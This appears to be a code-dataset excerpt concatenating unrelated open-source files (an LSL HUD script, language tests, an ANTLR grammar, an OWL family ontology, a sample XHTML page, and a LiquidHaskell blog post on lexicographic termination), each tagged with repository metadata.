log("Configuring skin button");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "skin1",
PRIM_TEXTURE, ALL_SIDES, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 4, TEXTURE_BLANK, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0
]);
log("Rezzing buttons");
link_me = TRUE;
// z=0.76953
rez_object("1x2 button", <-0.25, 0.1, 0.6333>, <PI, 0.0, 0.0>);
}
else if (counter == 15) {
log("Configuring skin button");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "skin2",
PRIM_TEXTURE, ALL_SIDES, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 4, TEXTURE_BLANK, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0
]);
log("Rezzing buttons");
link_me = TRUE;
// z=0.76953
rez_object("1x2 button", <-0.25, -0.1, 0.7333>, <PI, 0.0, 0.0>);
}
else if (counter == 16) {
log("Configuring skin button");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "skin3",
PRIM_TEXTURE, ALL_SIDES, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 4, TEXTURE_BLANK, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0
]);
log("Rezzing buttons");
link_me = TRUE;
// z=0.76953
rez_object("1x2 button", <-0.25, 0.1, 0.7333>, <PI, 0.0, 0.0>);
}
else if (counter == 17) {
log("Configuring skin button");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "skin4",
PRIM_TEXTURE, ALL_SIDES, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 4, TEXTURE_BLANK, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0
]);
log("Rezzing buttons");
link_me = TRUE;
// z=0.76953
rez_object("1x2 button", <-0.25, -0.1, 0.8333>, <PI, 0.0, 0.0>);
}
else if (counter == 18) {
log("Configuring skin button");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "skin5",
PRIM_TEXTURE, ALL_SIDES, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 4, TEXTURE_BLANK, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0
]);
log("Rezzing buttons");
link_me = TRUE;
// z=0.76953
rez_object("1x2 button", <-0.25, 0.1, 0.8333>, <PI, 0.0, 0.0>);
}
else if (counter == 19) {
log("Configuring skin button");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "skin6",
PRIM_TEXTURE, ALL_SIDES, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 4, TEXTURE_BLANK, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0
]);
log("Rezzing buttons");
link_me = TRUE;
// z=0.76953
rez_object("1x2 button", <-0.25, -0.1, 0.9333>, <PI, 0.0, 0.0>);
}
else if (counter == 20) {
log("Configuring skin button");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "skin7",
PRIM_TEXTURE, ALL_SIDES, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 4, TEXTURE_BLANK, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0
]);
log("Rezzing buttons");
link_me = TRUE;
// z=0.76953
rez_object("1x2 button", <-0.25, 0.1, 0.9333>, <PI, 0.0, 0.0>);
}
else if (counter == 21) {
log("Configuring skin button");
llSetLinkPrimitiveParamsFast(2, [
PRIM_NAME, "skin8",
PRIM_TEXTURE, ALL_SIDES, TEXTURE_TRANSPARENT, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0,
PRIM_TEXTURE, 4, TEXTURE_BLANK, <1.0, 1.0, 0.0>, <0.0, 0.0, 0.0>, 0.0
]);
}
}
}
| LSL | 4 | seriesumei/test-Ruth2 | Contrib/Serie Sumei/hud-maker.lsl | [
"MIT"
] |
script = require './scriptAssertions'
shouldOutput = script.shouldOutput
describe 'blocks'
it 'can be assigned, when given a parameter'
'a = @()
"a"
print (a())' shouldOutput "'a'"
describeOptionalsWithDelimiter (block) =
block ':'
block '='
describeOptionalsWithDelimiter @(delim)
it "can be given optional parameters with #(delim)"
"f (block) = block (optional #(delim) 'optional')
x = f @(optional #(delim) nil)
optional
print (x)" shouldOutput "'optional'"
it "can be given optional parameters after normal with #(delim)"
"f (block) = block ('arg', optional #(delim) 'optional')
x = f @(arg, optional #(delim) nil)
arg + optional
print (x)" shouldOutput "'argoptional'"
describe 'splat parameters'
it 'can accept splat parameters'
"f (block) = block (1, 2, 3)
f @(args, ...)
print (args)" shouldOutput "[ 1, 2, 3 ]"
| PogoScript | 3 | featurist/pogoscript | test/blockSpec.pogo | [
"BSD-2-Clause"
] |
parser grammar A10_lacp_trunk;
import A10_common;
options {
tokenVocab = A10Lexer;
}
// ACOS 2.X style lacp trunk definition
s_lacp_trunk: LACP_TRUNK trunk_number NEWLINE slt_definition*;
// TODO determine other allowed syntax here
// presumably overlaps some with `interface trunk` syntax
slt_definition: sltd_ports_threshold;
sltd_ports_threshold: PORTS_THRESHOLD ports_threshold NEWLINE;
| ANTLR | 4 | ton31337/batfish | projects/batfish/src/main/antlr4/org/batfish/vendor/a10/grammar/A10_lacp_trunk.g4 | [
"Apache-2.0"
] |
package
public val closure: () -> kotlin.Unit
public fun f(): kotlin.Unit
| Text | 1 | qussarah/declare | compiler/testData/diagnostics/tests/inner/referenceToSelfInLocal.txt | [
"Apache-2.0"
] |
<!DOCTYPE Ontology [
<!ENTITY xsd "http://www.w3.org/2001/XMLSchema#" >
<!ENTITY rdfs "http://www.w3.org/2000/01/rdf-schema#" >
]>
<Ontology
xml:base="http://example.com/owl/families/"
ontologyIRI="http://example.com/owl/families"
versionIRI="http://example.com/owl/families/2017-10-05/family.owl"
xmlns="http://www.w3.org/2002/07/owl#">
<Prefix name="owl" IRI="http://www.w3.org/2002/07/owl#"/>
<Prefix name="otherOnt" IRI="http://example.org/otherOntologies/families/"/>
<Annotation>
<AnnotationProperty abbreviatedIRI="owl:versionInfo"/>
<Literal>version 4.0</Literal>
</Annotation>
<Declaration>
<NamedIndividual IRI="John"/>
</Declaration>
<Declaration>
<NamedIndividual IRI="Mary"/>
</Declaration>
<Declaration>
<NamedIndividual IRI="Jim"/>
</Declaration>
<Declaration>
<NamedIndividual IRI="James"/>
</Declaration>
<Declaration>
<NamedIndividual IRI="Jack"/>
</Declaration>
<Declaration>
<NamedIndividual IRI="Bill"/>
</Declaration>
<Declaration>
<NamedIndividual IRI="Susan"/>
</Declaration>
<Declaration>
<NamedIndividual IRI="Meg"/>
</Declaration>
<Declaration>
<NamedIndividual IRI="Eagle"/>
</Declaration>
<Declaration>
<Class IRI="Eagle"/>
</Declaration>
<Declaration>
<Class IRI="Person"/>
</Declaration>
<AnnotationAssertion>
<AnnotationProperty IRI="&rdfs;comment"/>
<IRI>Person</IRI>
<Literal>Represents the set of all people.</Literal>
</AnnotationAssertion>
<AnnotationAssertion>
<AnnotationProperty IRI="&rdfs;label"/>
<IRI>Person</IRI>
<Literal xml:lang="en">Person</Literal>
</AnnotationAssertion>
<AnnotationAssertion>
<AnnotationProperty IRI="&rdfs;label"/>
<IRI>Person</IRI>
<Literal xml:lang="es">Persona</Literal>
</AnnotationAssertion>
<AnnotationAssertion>
<AnnotationProperty IRI="fizz"/>
<IRI>Person</IRI>
<IRI>Fazz</IRI>
</AnnotationAssertion>
<Declaration>
<Class IRI="Woman"/>
</Declaration>
<Declaration>
<Class IRI="Parent"/>
</Declaration>
<Declaration>
<Class IRI="Father"/>
</Declaration>
<Declaration>
<Class IRI="Mother"/>
</Declaration>
<Declaration>
<Class IRI="SocialRole"/>
</Declaration>
<Declaration>
<Class IRI="Man"/>
</Declaration>
<Declaration>
<Class IRI="Teenager"/>
</Declaration>
<Declaration>
<Class IRI="ChildlessPerson"/>
</Declaration>
<Declaration>
<Class IRI="Human"/>
</Declaration>
<Declaration>
<Class IRI="Female"/>
</Declaration>
<Declaration>
<Class IRI="HappyPerson"/>
</Declaration>
<Declaration>
<Class IRI="JohnsChildren"/>
</Declaration>
<Declaration>
<Class IRI="NarcisticPerson"/>
</Declaration>
<Declaration>
<Class IRI="MyBirthdayGuests"/>
</Declaration>
<Declaration>
<Class IRI="Dead"/>
</Declaration>
<Declaration>
<Class IRI="Orphan"/>
</Declaration>
<Declaration>
<Class IRI="Adult"/>
</Declaration>
<Declaration>
<Class IRI="YoungChild"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasWife"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasChild"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasDaughter"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="loves"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasSpouse"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasGrandparent"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasParent"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasBrother"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasUncle"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasSon"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="#hasAncestor"/>
</Declaration>
<Declaration>
<ObjectProperty IRI="hasHusband"/>
</Declaration>
<Declaration>
<DataProperty IRI="hasAge"/>
</Declaration>
<Declaration>
<DataProperty IRI="hasSSN"/>
</Declaration>
<Declaration>
<Datatype IRI="personAge"/>
</Declaration>
<Declaration>
<Datatype IRI="minorAge"/>
</Declaration>
<Declaration>
<Datatype IRI="majorAge"/>
</Declaration>
<Declaration>
<Datatype IRI="toddlerAge"/>
</Declaration>
<DatatypeDefinition>
<Datatype IRI="personAge"/>
<DatatypeRestriction>
<Datatype IRI="&xsd;integer"/>
<FacetRestriction facet="&xsd;minInclusive">
<Literal datatypeIRI="&xsd;integer">0</Literal>
</FacetRestriction>
<FacetRestriction facet="&xsd;maxInclusive">
<Literal datatypeIRI="&xsd;integer">150</Literal>
</FacetRestriction>
</DatatypeRestriction>
</DatatypeDefinition>
<DatatypeDefinition>
<Datatype IRI="minorAge"/>
<DatatypeRestriction>
<Datatype IRI="&xsd;integer"/>
<FacetRestriction facet="&xsd;minInclusive">
<Literal datatypeIRI="&xsd;integer">0</Literal>
</FacetRestriction>
<FacetRestriction facet="&xsd;maxInclusive">
<Literal datatypeIRI="&xsd;integer">18</Literal>
</FacetRestriction>
</DatatypeRestriction>
</DatatypeDefinition>
<DatatypeDefinition>
<Datatype IRI="majorAge"/>
<DataIntersectionOf>
<Datatype IRI="personAge"/>
<DataComplementOf>
<Datatype IRI="minorAge"/>
</DataComplementOf>
</DataIntersectionOf>
</DatatypeDefinition>
<DatatypeDefinition>
<Datatype IRI="toddlerAge"/>
<DataOneOf>
<Literal datatypeIRI="&xsd;integer">1</Literal>
<Literal datatypeIRI="&xsd;integer">2</Literal>
</DataOneOf>
</DatatypeDefinition>
<SymmetricObjectProperty>
<ObjectProperty IRI="hasSpouse"/>
</SymmetricObjectProperty>
<AsymmetricObjectProperty>
<ObjectProperty IRI="hasChild"/>
</AsymmetricObjectProperty>
<DisjointObjectProperties>
<ObjectProperty IRI="hasParent"/>
<ObjectProperty IRI="hasSpouse"/>
</DisjointObjectProperties>
<ReflexiveObjectProperty>
<ObjectProperty IRI="hasRelative"/>
</ReflexiveObjectProperty>
<IrreflexiveObjectProperty>
<ObjectProperty IRI="parentOf"/>
</IrreflexiveObjectProperty>
<FunctionalObjectProperty>
<ObjectProperty IRI="hasHusband"/>
</FunctionalObjectProperty>
<InverseFunctionalObjectProperty>
<ObjectProperty IRI="hasHusband"/>
</InverseFunctionalObjectProperty>
<TransitiveObjectProperty>
<ObjectProperty IRI="#hasAncestor"/>
</TransitiveObjectProperty>
<ObjectPropertyDomain>
<ObjectProperty IRI="hasWife"/>
<Class IRI="Man"/>
</ObjectPropertyDomain>
<ObjectPropertyRange>
<ObjectProperty IRI="hasWife"/>
<Class IRI="Woman"/>
</ObjectPropertyRange>
<InverseObjectProperties>
<ObjectProperty IRI="hasParent"/>
<ObjectProperty IRI="hasChild"/>
</InverseObjectProperties>
<DisjointObjectProperties>
<ObjectProperty IRI="hasSon"/>
<ObjectProperty IRI="hasDaughter"/>
</DisjointObjectProperties>
<EquivalentObjectProperties>
<ObjectProperty IRI="hasChild"/>
<ObjectProperty abbreviatedIRI="otherOnt:child"/>
</EquivalentObjectProperties>
<SubObjectPropertyOf>
<ObjectProperty IRI="hasWife"/>
<ObjectProperty IRI="hasSpouse"/>
</SubObjectPropertyOf>
<SubObjectPropertyOf>
<ObjectProperty IRI="hasFather"/>
<ObjectProperty IRI="hasParent"/>
</SubObjectPropertyOf>
<SubObjectPropertyOf>
<ObjectPropertyChain>
<ObjectProperty IRI="hasParent"/>
<ObjectProperty IRI="hasParent"/>
</ObjectPropertyChain>
<ObjectProperty IRI="hasGrandparent"/>
</SubObjectPropertyOf>
<SubObjectPropertyOf>
<ObjectPropertyChain>
<ObjectProperty IRI="hasFather"/>
<ObjectProperty IRI="hasBrother"/>
</ObjectPropertyChain>
<ObjectProperty IRI="hasUncle"/>
</SubObjectPropertyOf>
<SubObjectPropertyOf>
<ObjectPropertyChain>
<ObjectProperty IRI="hasFather"/>
<ObjectProperty IRI="hasBrother"/>
</ObjectPropertyChain>
<ObjectProperty IRI="hasUncle"/>
</SubObjectPropertyOf>
<HasKey>
<Class IRI="Person"/>
<DataProperty IRI="hasSSN"/>
</HasKey>
<DataPropertyDomain>
<DataProperty IRI="hasAge"/>
<Class IRI="Person"/>
</DataPropertyDomain>
<DataPropertyRange>
<DataProperty IRI="hasAge"/>
<Datatype IRI="&xsd;nonNegativeInteger"/>
</DataPropertyRange>
<FunctionalDataProperty>
<DataProperty IRI="hasAge"/>
</FunctionalDataProperty>
<EquivalentDataProperties>
<DataProperty IRI="hasAge"/>
<DataProperty abbreviatedIRI="otherOnt:age"/>
</EquivalentDataProperties>
<SubClassOf>
<Class IRI="Woman"/>
<Class IRI="Person"/>
</SubClassOf>
<SubClassOf>
<Class IRI="Mother"/>
<Class IRI="Woman"/>
</SubClassOf>
<SubClassOf>
<Class IRI="Grandfather"/>
<ObjectIntersectionOf>
<Class IRI="Man"/>
<Class IRI="Parent"/>
</ObjectIntersectionOf>
</SubClassOf>
<SubClassOf>
<Class IRI="Father"/>
<ObjectIntersectionOf>
<Class IRI="Man"/>
<Class IRI="Parent"/>
</ObjectIntersectionOf>
</SubClassOf>
<SubClassOf>
<Class IRI="ChildlessPerson"/>
<ObjectIntersectionOf>
<Class IRI="Person"/>
<ObjectComplementOf>
<ObjectSomeValuesFrom>
<ObjectInverseOf>
<ObjectProperty IRI="hasParent"/>
</ObjectInverseOf>
<Class abbreviatedIRI="owl:Thing"/>
</ObjectSomeValuesFrom>
</ObjectComplementOf>
</ObjectIntersectionOf>
</SubClassOf>
<SubClassOf>
<ObjectIntersectionOf>
<ObjectOneOf>
<NamedIndividual IRI="Mary"/>
<NamedIndividual IRI="Bill"/>
<NamedIndividual IRI="Meg"/>
</ObjectOneOf>
<Class IRI="Female"/>
</ObjectIntersectionOf>
<ObjectIntersectionOf>
<Class IRI="Parent"/>
<ObjectMaxCardinality cardinality="1">
<ObjectProperty IRI="hasChild"/>
</ObjectMaxCardinality>
<ObjectAllValuesFrom>
<ObjectProperty IRI="hasChild"/>
<Class IRI="Female"/>
</ObjectAllValuesFrom>
</ObjectIntersectionOf>
</SubClassOf>
<SubClassOf>
<Class IRI="Teenager"/>
<DataSomeValuesFrom>
<DataProperty IRI="hasAge"/>
<DatatypeRestriction>
<Datatype IRI="&xsd;integer"/>
<FacetRestriction facet="&xsd;minExclusive">
<Literal datatypeIRI="&xsd;integer">12</Literal>
</FacetRestriction>
<FacetRestriction facet="&xsd;maxInclusive">
<Literal datatypeIRI="&xsd;integer">19</Literal>
</FacetRestriction>
</DatatypeRestriction>
</DataSomeValuesFrom>
</SubClassOf>
<SubClassOf>
<Annotation>
<AnnotationProperty IRI="&rdfs;comment"/>
<Literal datatypeIRI="&xsd;string">"States that every man is a person."</Literal>
</Annotation>
<Class IRI="Man"/>
<Class IRI="Person"/>
</SubClassOf>
<SubClassOf>
<Class IRI="Woman"/>
<ObjectSomeValuesFrom>
<ObjectProperty IRI="hasChild"/>
<Class IRI="HappyPerson"/>
</ObjectSomeValuesFrom>
</SubClassOf>
<EquivalentClasses>
<Class IRI="HappyPerson"/>
<ObjectIntersectionOf>
<ObjectAllValuesFrom>
<ObjectProperty IRI="hasChild"/>
<Class IRI="HappyPerson"/>
</ObjectAllValuesFrom>
<ObjectSomeValuesFrom>
<ObjectProperty IRI="hasChild"/>
<Class IRI="HappyPerson"/>
</ObjectSomeValuesFrom>
</ObjectIntersectionOf>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="JohnsChildren"/>
<ObjectHasValue>
<ObjectProperty IRI="hasParent"/>
<NamedIndividual IRI="John"/>
</ObjectHasValue>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="NarcisticPerson"/>
<ObjectHasSelf>
<ObjectProperty IRI="loves"/>
</ObjectHasSelf>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="Orphan"/>
<ObjectAllValuesFrom>
<ObjectInverseOf>
<ObjectProperty IRI="hasChild"/>
</ObjectInverseOf>
<Class IRI="Dead"/>
</ObjectAllValuesFrom>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="MyBirthdayGuests"/>
<ObjectOneOf>
<NamedIndividual IRI="Bill"/>
<NamedIndividual IRI="John"/>
<NamedIndividual IRI="Mary"/>
</ObjectOneOf>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="Adult"/>
<Class abbreviatedIRI="otherOnt:Grownup"/>
</EquivalentClasses>
<EquivalentClasses>
<Class abbreviatedIRI="otherOnt:Nonchild"/>
<Class abbreviatedIRI="otherOnt:Grownup"/>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="Parent"/>
<ObjectSomeValuesFrom>
<ObjectProperty IRI="hasChild"/>
<Class IRI="Person"/>
</ObjectSomeValuesFrom>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="Person"/>
<Class IRI="Human"/>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="Mother"/>
<ObjectIntersectionOf>
<Class IRI="Woman"/>
<Class IRI="Parent"/>
</ObjectIntersectionOf>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="Parent"/>
<ObjectUnionOf>
<Class IRI="Mother"/>
<Class IRI="Father"/>
</ObjectUnionOf>
</EquivalentClasses>
<EquivalentClasses>
<Class IRI="ChildlessPerson"/>
<ObjectIntersectionOf>
<Class IRI="Person"/>
<ObjectComplementOf>
<Class IRI="Parent"/>
</ObjectComplementOf>
</ObjectIntersectionOf>
</EquivalentClasses>
<DisjointClasses>
<Class IRI="Woman"/>
<Class IRI="Man"/>
</DisjointClasses>
<DisjointClasses>
<Class IRI="Father"/>
<Class IRI="Mother"/>
<Class IRI="YoungChild"/>
</DisjointClasses>
<DifferentIndividuals>
<NamedIndividual IRI="John"/>
<NamedIndividual IRI="Bill"/>
</DifferentIndividuals>
<SameIndividual>
<NamedIndividual IRI="James"/>
<NamedIndividual IRI="Jim"/>
</SameIndividual>
<SameIndividual>
<NamedIndividual IRI="John"/>
<NamedIndividual abbreviatedIRI="otherOnt:JohnBrown"/>
</SameIndividual>
<SameIndividual>
<NamedIndividual IRI="Mary"/>
<NamedIndividual abbreviatedIRI="otherOnt:MaryBrown"/>
</SameIndividual>
<ObjectPropertyAssertion>
<ObjectProperty IRI="hasWife"/>
<NamedIndividual IRI="John"/>
<NamedIndividual IRI="Mary"/>
</ObjectPropertyAssertion>
<ObjectPropertyAssertion>
<ObjectProperty IRI="#hasAncestor"/>
<NamedIndividual IRI="Susan"/>
<NamedIndividual IRI="Meg"/>
</ObjectPropertyAssertion>
<DataPropertyAssertion>
<DataProperty IRI="hasAge"/>
<NamedIndividual IRI="John"/>
<Literal datatypeIRI="&xsd;integer">51</Literal>
</DataPropertyAssertion>
<ClassAssertion>
<Class IRI="Person"/>
<NamedIndividual IRI="Mary"/>
</ClassAssertion>
<ClassAssertion>
<Class IRI="Woman"/>
<NamedIndividual IRI="Mary"/>
</ClassAssertion>
<ClassAssertion>
<ObjectIntersectionOf>
<Class IRI="Person"/>
<ObjectComplementOf>
<Class IRI="Parent"/>
</ObjectComplementOf>
</ObjectIntersectionOf>
<NamedIndividual IRI="Jack"/>
</ClassAssertion>
<ClassAssertion>
<ObjectMaxCardinality cardinality="4">
<ObjectProperty IRI="hasChild"/>
<Class IRI="Parent"/>
</ObjectMaxCardinality>
<NamedIndividual IRI="John"/>
</ClassAssertion>
<ClassAssertion>
<ObjectMinCardinality cardinality="2">
<ObjectProperty IRI="hasChild"/>
<Class IRI="Parent"/>
</ObjectMinCardinality>
<NamedIndividual IRI="John"/>
</ClassAssertion>
<ClassAssertion>
<ObjectExactCardinality cardinality="3">
<ObjectProperty IRI="hasChild"/>
<Class IRI="Parent"/>
</ObjectExactCardinality>
<NamedIndividual IRI="John"/>
</ClassAssertion>
<ClassAssertion>
<ObjectExactCardinality cardinality="5">
<ObjectProperty IRI="hasChild"/>
</ObjectExactCardinality>
<NamedIndividual IRI="John"/>
</ClassAssertion>
<ClassAssertion>
<Class IRI="Father"/>
<NamedIndividual IRI="John"/>
</ClassAssertion>
<ClassAssertion>
<Class IRI="SocialRole"/>
<NamedIndividual IRI="Father"/>
</ClassAssertion>
<NegativeObjectPropertyAssertion>
<ObjectProperty IRI="hasWife"/>
<NamedIndividual IRI="Bill"/>
<NamedIndividual IRI="Mary"/>
</NegativeObjectPropertyAssertion>
<NegativeDataPropertyAssertion>
<DataProperty IRI="hasAge"/>
<NamedIndividual IRI="Jack"/>
<Literal datatypeIRI="&xsd;integer">53</Literal>
</NegativeDataPropertyAssertion>
<NegativeObjectPropertyAssertion>
<ObjectProperty IRI="hasDaughter"/>
<NamedIndividual IRI="Bill"/>
<NamedIndividual IRI="Susan"/>
</NegativeObjectPropertyAssertion>
</Ontology>
| Web Ontology Language | 5 | jheinnic/SciGraph | SciGraph-core/src/test/resources/ontologies/family.owl | [
"Apache-2.0"
] |
MODULE SHAPEFILE
DESCRIPTION IDL shapefile format support DLM
VERSION shapelib 1.2.10
SOURCE Harris Geospatial Solutions, Inc.
BUILD_DATE JUN 29 2020
CHECKSUM AN86EBFY
FUNCTION IDLFFSHAPE::GETATTRIBUTES 1 2 KEYWORDS
FUNCTION IDLFFSHAPE::GETENTITY 1 2 KEYWORDS
FUNCTION IDLFFSHAPE::INIT 1 2 KEYWORDS
FUNCTION IDLFFSHAPE::OPEN 1 2 KEYWORDS
PROCEDURE IDLFFSHAPE::ADDATTRIBUTE 4 4 KEYWORDS
PROCEDURE IDLFFSHAPE::CLEANUP 1 1
PROCEDURE IDLFFSHAPE::CLOSE 1 1
PROCEDURE IDLFFSHAPE::DESTROYENTITY 2 2
PROCEDURE IDLFFSHAPE::GETPROPERTY 1 1 KEYWORDS
PROCEDURE IDLFFSHAPE::PUTENTITY 2 2
PROCEDURE IDLFFSHAPE::SETATTRIBUTES 3 4
STRUCTURE IDLFFSHAPE
STRUCTURE IDL_SHAPE_ATTRIBUTE
STRUCTURE IDL_SHAPE_ENTITY
| IDL | 2 | rogerionegri/MICE | MICE/idl88/bin/bin.linux.x86_64/idl_shape.dlm | [
"MIT"
] |
"""The SolarEdge Local Integration."""
| Python | 0 | domwillcode/home-assistant | homeassistant/components/solaredge_local/__init__.py | [
"Apache-2.0"
] |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<title>XHTML markup</title>
</head>
<body style="background-color:#ffffcc; color:#008800">
<br />
<h2 align="center">Sample XHTML page</h2>
<br />
<div align="center">
<img src="../images/bee3.jpg" width="400" height="250" alt="Beep" vspace="20" />
</div>
<p align="center" style="font-size:17px">Bar Foo,<br />
Foo,<br />
Bar<br />
Foo</p>
<p align="center"><em>String</em></p>
<br />
<hr />
</body>
</html>
| HTML | 3 | fuelingtheweb/prettier | tests/html_doctype_declarations/xhtml1.1.html | [
"MIT"
] |
--TEST--
hex2bin(); function test
--CREDITS--
edgarsandi - <edgar.r.sandi@gmail.com>
--FILE--
<?php
var_dump(hex2bin('AH'));
var_dump(hex2bin('HA'));
?>
--EXPECTF--
Warning: hex2bin(): Input string must be hexadecimal string in %s on line %d
bool(false)
Warning: hex2bin(): Input string must be hexadecimal string in %s on line %d
bool(false)
| PHP | 3 | thiagooak/php-src | ext/standard/tests/strings/hex2bin_error.phpt | [
"PHP-3.01"
] |
---
layout: post
title: "Lexicographic Termination"
date: 2013-12-15 16:12
comments: true
external-url:
categories: termination, lexicographic ordering
author: Niki Vazou
published: true
demo: LexicographicTermination.hs
---
[Previously][ref-termination] we saw how refinements can be used to prove termination
and we promised to extend our termination checker to handle "real-word" programs.
Keeping our promise, today we shall see a trick that allows liquidHaskell to prove termination on
more recursive functions, namely *lexicographic termination*.
<!-- more -->
<div class="hidden">
\begin{code}
module LexicographicTermination where
import Language.Haskell.Liquid.Prelude (liquidError)
\end{code}
</div>
Does Ackermann Function Terminate?
----------------------------------
Consider the famous [Ackermann
function](http://en.wikipedia.org/wiki/Ackermann_function)
\begin{code}
{-@ ack :: m:Nat -> n:Nat -> Nat @-}
ack :: Int -> Int -> Int
ack m n
| m == 0 = n + 1
| m > 0 && n == 0 = ack (m-1) 1
| m > 0 && n > 0 = ack (m-1) (ack m (n-1))
| otherwise = liquidError "Bad arguments!!!"
\end{code}
Does `ack` terminate?
At each iteration
1. Either `m` decreases,
2. or `m` remains the same and `n` decreases.
Each time that `n` reaches `0`, `m` decreases, so `m` will
eventaully reach `0` and `ack` will terminate.
Expressed more technically the pair `(m, n)`
decreases in the [lexicographic order](htpp://en.wikipedia/wiki/Lexicographic_order)
on pairs, which is a well-ordering, ie.,
we cannot go down infinitely many times.
Express Termination Metric
--------------------------
Great! The pair `(m, n)` is a *well-founded metric* on the Ackermann function that decreases.
From the [previous post][ref-termination] a well-founded metric is all
liquidHaskell needs to prove termination.
So, we should feed the tool with this information.
Remember the `Decrease` token?
We used it [previously][ref-termination]
to specify which is the decreasing argument.
Now, we will use it with more arguments to specify
our decreasing pair. So,
\begin{code}
{-@ Decrease ack 1 2 @-}
\end{code}
says that the decreasing metric is the pair of the first
and the second arguments,
ie., the pair `(m, n)`.
Finally, we will see how liquidHaskell uses this annotation to prove
termination.
Proving Termination By Types
----------------------------
Following once more our [previous post][ref-termination],
liquidHaskell typechecks the *body* of `ack` under an environment that
restricts `ack` to only be called on inputs *less than* `(m,n)`.
This time "less than" referes not to ordering on natural numbers, but to lexicographic
ordering
, i.e., using
an environment:
- `m :: Nat`
- `n :: Nat`
- `ack :: m':Nat -> n':{v:Nat | m' < m || (m' = m && v < n)} -> Nat`
This ensures that any (recursive) call in the body only calls `ack`
with inputs smaller than the current parameter `(m, n)`. Since its body
typechecks in this environment, i.e. `ack` is called with smaller parameters, LiquidHaskell proves
that `ack` terminates.
Someone may find the `Decrease` token annoying:
if we insert another argument we should also update the decrease information.
LiquidHaskell supports an alternative notation,
which lets you annotate the type signature
with a list of *decreasing expressions*.
\begin{code} So, `ack` will also typecheck against the signature:
{-@ ack :: m:Nat -> n:Nat -> Nat / [m, n] @-}
\end{code}
But what is the syntax of the decreasing expressions?
Are they restricted to function parameters?
No, but that is the subject of a next post!
[ref-lies]: /blog/2013/11/23/telling-lies.lhs/
[ref-bottom]: /blog/2013/12/01/getting-to-the-bottom.lhs/
[ref-termination]: /blog/2013/12/08/termination-checking.lhs/
| Literate Haskell | 5 | curiousleo/liquidhaskell | docs/blog/2013-12-24-lexicographic-termination.lhs | [
"MIT",
"BSD-3-Clause"
] |
// Copyright (c) 2017 Massachusetts Institute of Technology
//
// Permission is hereby granted, free of charge, to any person
// obtaining a copy of this software and associated documentation
// files (the "Software"), to deal in the Software without
// restriction, including without limitation the rights to use, copy,
// modify, merge, publish, distribute, sublicense, and/or sell copies
// of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
// BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
// ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
// CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
// SOFTWARE.
import Ehr::*;
import CCTypes::*;
import Vector::*;
import ProcTypes::*;
interface MshrDeadlockChecker#(numeric type num);
